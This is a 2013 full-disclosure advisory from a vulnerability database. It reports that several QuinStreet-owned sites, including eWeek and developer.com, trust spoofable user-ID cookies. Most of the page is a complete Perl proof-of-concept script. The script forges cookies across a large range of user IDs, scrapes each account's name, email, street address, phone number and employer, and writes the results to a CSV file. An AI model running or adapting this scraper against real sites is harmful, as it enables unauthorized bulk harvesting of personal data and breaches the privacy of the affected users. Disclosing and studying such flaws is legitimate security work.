QuinStreet Database ID Spoofing

2013.03.14
Credit: Anonymous
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# March 13, 2013 # FULL-DISCLOSURE Exclusive - Vielen Dank John! # # VULNERABILITY SUMMARY # --------------------- # A confirmed security vulnerability has been identified with 30 high traffic web # sites owned by QuinStreet. Vendor stores database IDs in cookies which are # easily spoofed (USERID_COOKIE), allowing all user information to be accessed. # Seven million users are reportedly in the database: # http://www.itbusinessedge.com/about-itbe # # Web sites include: # # Ziff Davis # ---------- # http://www.eweek.com/ # # PROOF OF CONCEPT # ---------------- # The below sample POC Perl script will extract user demographic data from the # above listed web sites and write the contents to a csv file. # # On Windows, use http://www.strawberryperl.com/, for other O/S visit www.perl.org/get.html # use strict; use WWW::Mechanize; use HTTP::Cookies; # assetforms.* are iframes inserted into each website user management page my @urls = ("http://assetform.itbusinessedge.com/acl/accountController.jsp", "http://assetform.eweek.com/acl/accountController.jsp?css=eweek/" ."eweekArticleRegistrationForm.css&sdn=Eweek&w=http://www.eweek.com" ."&u=%2Findex.php%2FaccountManagement%3F&isIframed=yes&rand=11207&formType=", "http://assetform.developer.com/acl/accountController.jsp?formType=" ."userProfile&css=developerCom/developerComArticleRegistrationForm.css&w=" ."http://www.developer.com&sdn=developer&nlalkeys=null&submit=submit/"); my $agent = "User-Agent=Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; " ."Trident/6.0)"; #comma delimited file name my $outfile = "eweek-users" .int(rand 100000) . ".csv"; my $cookie_jar = HTTP::Cookies->new; my $mech = WWW::Mechanize->new(cookie_jar=>$cookie_jar); $mech->agent($agent); my $url; my $Website; my $LowUserid_Cookie = 0; my $HighUserid_Cookie = 0; my $i; my $SessDate; my $UserDemographic; my $output_page; RandUserRange(); CreateCsvHeader(); for ($i = $LowUserid_Cookie; $i < $HighUserid_Cookie; $i+=100) { $SessDate = "136303" . int(1000000 + rand 1000000); setCookies($i,$SessDate); foreach $url (@urls){ $Website = substr($url, 17, 5); retrieveUrl($url); #print "\n\nCookies:\n", $mech->cookie_jar->as_string, "\n"; print ("UserID:" . $i . "\n"); print ("Website" . $Website . "\n"); print ("Length of output_page:" . length($output_page)); print ("\n\n"); last if length($output_page); } if (length($output_page)) { open(OUTFILE,">>$outfile"); $UserDemographic = processForm($i); print OUTFILE $UserDemographic; #print OUTFILE $output_page; close (OUTFILE); } } exit; sub RandUserRange { # if (rand(2) < 1) { #$LowUserid_Cookie = int(rand( 1000)) + 390000; #$LowUserid_Cookie .= "21"; $LowUserid_Cookie = "38500021"; $HighUserid_Cookie ="47000021"; # } # else { #$LowUserid_Cookie = int(rand(10000)) + 1500000; # $LowUserid_Cookie = "144530710"; # $HighUserid_Cookie = "180000000"; # } } sub setCookies { $cookie_jar->clear; $cookie_jar->set_cookie('0','USERID_COOKIE',$_[0],'/','.itbusinessedge.com',0); $cookie_jar->set_cookie('0','SESSDATE_COOKIE',$_[1],'/','.itbusinessedge.com',0); $cookie_jar->set_cookie('0','USERID_COOKIE',$_[0],'/','.eweek.com',0); $cookie_jar->set_cookie('0','SESSDATE_COOKIE',$_[1],'/','.eweek.com',0); $cookie_jar->set_cookie('0','USERID_COOKIE',$_[0],'/','.developer.com',0); $cookie_jar->set_cookie('0','SESSDATE_COOKIE',$_[1],'/','.developer.com',0); } sub retrieveUrl { $mech->get($_[0]); $output_page = $mech->content(); if ($output_page =~ m/Sign In/) { $output_page = ""; } return ($output_page); } sub processForm { $mech->form_name("formTypePost"); my $Userid = $_[0]; my $FirstName = clean($mech->value('FN')); my $LastName = clean($mech->value('LN')); my $Email = clean($mech->value('EM')); my $CompanyName = clean($mech->value('CompanyName')); my $Title = clean($mech->value('Designation')); my $JobFunction = clean($mech->value('JobFunction')); my $DecisionRole = clean($mech->value('DecisionRole')); my $Employees = clean($mech->value('NumberofEmployeesRange')); my $Industry = clean($mech->value('Industry')); my $StreetAddress = clean($mech->value('S1')); my $City = clean($mech->value('CT')); my $State = clean($mech->value('SP')); my $PostalZone = clean($mech->value('PC')); my $Country = clean($mech->value('CN')); my $Phone = clean($mech->value('WP')); my $s; $s = $Userid .','. $Website .',' .$FirstName .','. $LastName .','. $Email .',' .$CompanyName .','. $Title .','. $JobFunction .','. $DecisionRole .',' .$Employees .','. $Industry .','. $StreetAddress .','. $City .','. $State .','. $PostalZone .','. $Country .','. $Phone . "\n"; return ($s); } sub clean { local($a) = ($_[0]); $a =~ s/[^a-zA-Z0-9 \.\@!_%+-]//g; return $a } sub CreateCsvHeader { open(OUTFILE,">$outfile") || die("File write error"); print OUTFILE "UserId,Website,FirstName,LastName,Email,CompanyName,Title," ."JobFunction,DecisionRole,Employees,Industry,StreetAddress,City,State," ."PostalCode,Country,Phone\n"; close(OUTFILE); }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top